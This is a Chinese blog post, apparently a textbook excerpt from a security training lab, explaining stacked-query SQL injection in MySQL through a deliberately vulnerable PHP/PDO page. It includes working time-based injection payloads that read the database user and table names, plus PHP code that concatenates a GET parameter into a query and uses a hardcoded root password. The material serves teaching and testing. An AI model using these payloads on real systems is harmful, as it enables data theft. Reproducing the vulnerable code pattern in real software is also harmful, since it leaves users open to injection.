首页 > 其他分享 >最新堆叠查询注入攻击和注入代码分析技术

最新堆叠查询注入攻击和注入代码分析技术

时间:2024-03-08 10:12:27浏览次数:32  
标签:语句 查询 堆叠 SQL select 注入

堆叠查询注入攻击

堆叠查询注入攻击的测试地址在本书第2章。

堆叠查询可以执行多条语句,多语句之间以分号隔开。堆叠查询注入就是利用这个特点,在第二个SQL语句中构造自己要执行的语句。首先访问id=1',页面返回MySQL错误,再访问id=1'%23,页面返回正常结果。这里可以使用Boolean注入、时间注入,也可以使用另一种注入方式——堆叠注入。

堆叠查询注入的语句如下:

';select if(substr(user(),1,1)='r',sleep(3),1)%23

从堆叠查询注入语句中可以看到,第二条SQL语句

(select if(substr(user(),1,1)='r', sleep(3),1)%23)

就是时间注入的语句,执行结果如图4-43所示。

图4-43  

 

后面获取数据的操作与时间注入的一样,通过构造不同的时间注入语句,可以得到完整的数据库的库名、表名、字段名和具体数据。执行以下语句,就可以获取数据库的表名。

';select if(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)='u',sleep(3),1)%23

结果如图4-44所示。

  

图4-44  

 


堆叠查询注入代码分析

在堆叠查询注入页面,程序获取GET参数ID,使用PDO的方式进行数据查询,但仍然将参数ID拼接到查询语句中,导致PDO没起到预编译的效果,程序仍然存在SQL注入漏洞,代码如下:

<?phptry {    $conn = new PDO("mysql:host=localhost;dbname=test", "root", "123456");    $conn->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);    $stmt = $conn->query("SELECT * FROM users where `id` = '" . $_GET['id'] . "'");    $result = $stmt->setFetchMode(PDO::FETCH_ASSOC);    foreach($stmt->fetchAll() as $k=>$v) {        foreach ($v as $key => $value) {            if($key == 'username'){                echo 'username : ' . $value;            }        }    }    $dsn = null;}catch(PDOException $e){    echo "error";}$conn = null;?>

使用PDO执行SQL语句时,可以执行多语句,不过这样通常不能直接得到注入结果,因为PDO只会返回第一条SQL语句执行的结果,所以在第二条语句中可以用update语句更新数据或者使用时间注入获取数据。访问dd.php?id=1';select if(ord(substring (user(),1,1))=114,sleep(3),1);%23时,执行的SQL语句如下:

SELECT * FROM users where `id` = '1';select if(ord(substring(user(),1,1))=114,sleep (3),1);#

此时,SQL语句分为两条,第一条为

SELECT * FROM users where `id` = '1'

是代码自己的select查询;

 

select if(ord(substring(user(),1,1))=114,sleep(3),1);#

则是我们构造的时间注入的语句。

 

 

Ms08067安全实验室专注于网络安全知识的普及和培训,是专业的“图书出版+培训”的网络安全在线教育平台,专注于网络安全领域中高端人才培养。

平台已开设Web安全零基础就业,Web高级安全攻防进阶,红队实战攻防特训,Java代码安全审计,恶意代码分析与免杀实战,CTF基础实战特训营,网络安全应急响应,安全工具开发,AI与网络安全等系统培训课程。实验室出版安全图书《Web安全攻防:渗透测试实战指南》、《内网安全攻防:渗透测试实战指南》、《Python安全攻防:渗透测试实战指南》、《Java代码审计:入门篇》等。

扫描客服微信 获取更多课件+学习资料

标签:语句,查询,堆叠,SQL,select,注入
From: https://www.cnblogs.com/ms08067/p/18060383

相关文章

  • R:相对丰度堆叠柱状图
    #清空当前环境中的所有对象rm(list=ls())setwd("C:\\Users\\Administrator\\Desktop\\新建文件夹\\Stackedbarchart")#设置工作目录library(ggplot2)#用于绘图library(ggalluvial)#用于绘制柱状图背后的条带library(grid)#用于访问unit函数ra<-as.matrix(......
  • 记录一个使用mysql查询表单,多个参数.
    publicDataTableQueryData(SearchViewModelmodel){DataTabledt=newDataTable();/把'删除掉,在编写文档时,不加个',MySqlParameter显示不出来/List<'MySqlParameter>param=newList<'MySqlParameter>();model.inputMonths=model.inputMonth......
  • Oracle数据库Date类型查询结果多出“.0“的解决方法
    ​ oracle设置数据库某张表的字段类型为date,数据库存值为 2019-11-2518:51:47格式,但是从数据库查询出来之后格式为  StringstopTime=map.get("stopTime").toString;2019-11-2518:51:47.0,多了个零,不知是毫秒还是纳秒,目前还不知为何,解决办法为转换时间类型或者前端分......
  • java mysql事物特性记录,在同一事物中更新执行后,立即查询得到的是新数据还是旧数据?
    在Java中,如果你使用MySQL,并且你在一个事务方法中执行了更新操作,那么在这个事务结束并提交之前,其他事务或查询(非同一事务内的)是看不到你的更新结果的。这是数据库事务的隔离性所保证的。 但是,如果你在同一事务中立即执行查询,你将看到更新后的数据。因为查询和更新都在同一个事务......
  • Oracle 关联查询
    在Oracle数据库中,左连接、右连接和全连接是用于联接两个表的不同类型的连接方式,它们之间的区别如下:例子T_11、T_12数据表  左连接(LEFTJOIN):左连接是指返回左表中的所有记录,以及符合连接条件的右表中的记录。如果右表中没有匹配的记录,则结果集中右表部分将显示为NULL......
  • sql server 查询所有表的记录条数
    DECLARE@tableNameNVARCHAR(MAX)DECLARE@sqlNVARCHAR(MAX)=''CREATETABLE#TempTable(TableNameSYSNAME,RowCountsBIGINT)--遍历所有用户表DECLARETableCursorCURSORFORSELECTt.NAMEFROMsys.tablestWHEREt.is_ms_shipped=0--过滤掉系统表ANDt.na......
  • 第六十八天 BBS项目之四 分组连表查询 路由匹配进阶使用
    一、内容回顾#1登录页面搭建-bootsrtap的栅格,form-group,input:form-control-验证码#2验证码图片的生成-1pillow生成一张图片-2图片上写文字-3设置文字大小,设置文字颜色,设置文字字体格式(ttf)-45位大小写字母,数字-5点,线,弧形-6放到bytesio,取出来 img.save(f,'p......
  • Oracle with查询
    在Oracle数据库中,"WITH"子句通常用于编写递归查询或者子查询,并且可以在查询中创建临时的命名结果集。这样可以使得复杂的查询变得更加清晰和易于理解。WITH子句也被称为公共表表达式(CTE)。下面是一个简单的示例,演示了WITH子句的基本用法: witht1as(selecthostid,host,sta......
  • MySQL多表联查、分组查询每组最新的一条数据,并对某一字段进行条件统计
    起因本人在写查询的时候遇到了如题所述的要求,多次尝试无果(纯菜),最后发现“sql不会写?那就疯狂联表+堆子查询”。如果有更好的写法,也请在评论区赐教表信息如下equipment表:存储设备的名称等信息。其实这个表在接下来的查询中的作用,仅仅只是通过eq_id和其它表进行关联,然后查询到设备......
  • SQLServer-查询区分字母大小写
    1、sqlserver默认不区分大小写: 2、可以手动区分大小写:ANDtcn.centerpress_number='2h(aa01/aa02)'--不区分大小写查询ANDtcn.centerpress_numberCOLLATEChinese_PRC_CS_AI_WS='2h(aa01/aa02)'--区分大小写,第一种写法,放在查询条件前边ANDtcn.centerpress_numberCOL......